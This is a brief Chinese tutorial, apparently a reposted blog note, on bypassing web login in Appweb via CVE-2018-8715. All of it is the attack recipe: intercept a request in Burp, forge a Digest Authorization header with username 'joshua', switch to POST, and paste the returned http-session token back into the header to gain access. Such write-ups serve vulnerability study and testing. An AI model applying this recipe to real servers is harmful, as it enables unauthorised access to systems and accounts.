1.burp抓包,添加一条伪造的认证:Authorization: Digest username=joshua
2.更改请求为POST,并将http-session拷贝放在Authorization上
-http-session-=8::http.session::892900dd6ceba83363f31b377e6f9d39
3.放包即可
参考:https://blog.csdn.net/weixin_42936566/article/details/87120710
Appweb(CVE-2018-8715)绕过web登录
最新推荐文章于 2024-06-14 13:25:11 发布